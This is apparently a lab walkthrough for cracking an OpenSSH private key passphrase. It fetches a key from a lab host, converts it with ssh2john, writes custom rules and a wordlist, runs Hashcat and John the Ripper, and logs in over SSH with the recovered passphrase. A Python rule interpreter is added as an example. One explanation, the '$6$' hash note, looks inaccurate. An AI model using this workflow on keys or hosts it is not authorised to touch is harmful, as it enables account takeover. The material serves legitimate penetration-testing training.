Published on June 24, 2025
This walkthrough shows every command used to crack an OpenSSH private key passphrase.
cd ~/passwordattacks
wget http://192.168.50.201:8080/id_rsa
wget http://192.168.50.201:8080/note.txt
ls -l
Explanation: cd into your working directory; wget downloads the private key and note; ls verifies files and permissions.
cat note.txt
Explanation: Displays plaintext passwords and policy notes.
chmod 600 id_rsa
Explanation: Restricts key file to owner read/write, required by SSH.
ssh -i id_rsa -p 2222 dave@192.168.50.201
Explanation: Tries to use the key; SSH prompts for the passphrase, and none of the passwords from the note match.
ssh2john id_rsa > ssh.hash
Explanation: JtR’s script transforms the key into a crackable hash.
cat ssh.hash
Explanation: Confirms the hash format; contains “$6$” for SHA-512 KDF.
hashcat -h | grep -i "ssh"
Explanation: Searches Hashcat help for “Private Keys ($6$)”; reveals mode 22921.
cat << 'EOF' > ssh.rule
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#
EOF
Explanation: c capitalizes the first letter; $1 $3 $7 append the digits “137”; $!, $@, $# append special chars.
cat << 'EOF' > ssh.passwords
Window
rickc137
dave
superdave
megadave
umbrella
EOF
Explanation: Contains candidate base passwords from the note.
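The effect of ssh.rule on ssh.passwords, as an added example that is not part of the original walkthrough: a small Python interpreter for the rule functions used above (c and $X, plus :, l, u and ^X from the same rule syntax). It shows that the whole search space is 18 candidates and lets you check whether a given passphrase is derivable from known base words; the function names are illustrative.

```python
# Added example: minimal interpreter for the rule functions used in ssh.rule.
RULES = ["c $1 $3 $7 $!", "c $1 $3 $7 $@", "c $1 $3 $7 $#"]      # from ssh.rule
WORDS = ["Window", "rickc137", "dave", "superdave", "megadave", "umbrella"]


def apply_rule(rule, word):
    """Apply one rule line to one base word and return the candidate."""
    i = 0
    while i < len(rule):
        op = rule[i]
        if op in " :":                      # separator / no-op
            i += 1
        elif op == "c":                     # first letter upper, rest lower
            word = word.capitalize()
            i += 1
        elif op == "l":                     # lowercase everything
            word = word.lower()
            i += 1
        elif op == "u":                     # uppercase everything
            word = word.upper()
            i += 1
        elif op in "$^":                    # $X appends X, ^X prepends X
            if i + 1 >= len(rule):
                raise ValueError(f"{op!r} needs a character argument")
            ch = rule[i + 1]
            word = word + ch if op == "$" else ch + word
            i += 2
        else:
            raise ValueError(f"unsupported rule function {op!r}")
    return word


def candidates(words, rules):
    """Every candidate the wordlist and rule set generate together."""
    return [apply_rule(r, w) for w in words for r in rules]


def derivable(passphrase, words, rules):
    """Return the (base word, rule) pairs that produce the passphrase."""
    return [(w, r) for w in words for r in rules
            if apply_rule(r, w) == passphrase]


if __name__ == "__main__":
    for cand in candidates(WORDS, RULES):
        print(cand)
    print("derivable:", derivable("Umbrella137!", WORDS, RULES))
```

A passphrase that `derivable` can reproduce from a handful of known words offers almost no protection for the key, whatever KDF the key file uses.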
hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force
Explanation: Hashcat errors “Token length exception” due to unsupported cipher (AES-256-CTR).
sudo sh -c '{ printf "\n[List.Rules:sshRules]\n"; cat ssh.rule; } >> /etc/john/john.conf'
Explanation: Adds the rules to john.conf as a named rule set, under [List.Rules:sshRules].
john --wordlist=ssh.passwords --rules=sshRules ssh.hash
Explanation: Uses sshRules and the custom wordlist; quickly finds the passphrase Umbrella137!
ssh -i id_rsa -p 2222 dave@192.168.50.201
Explanation: Enter the passphrase Umbrella137! to gain shell access.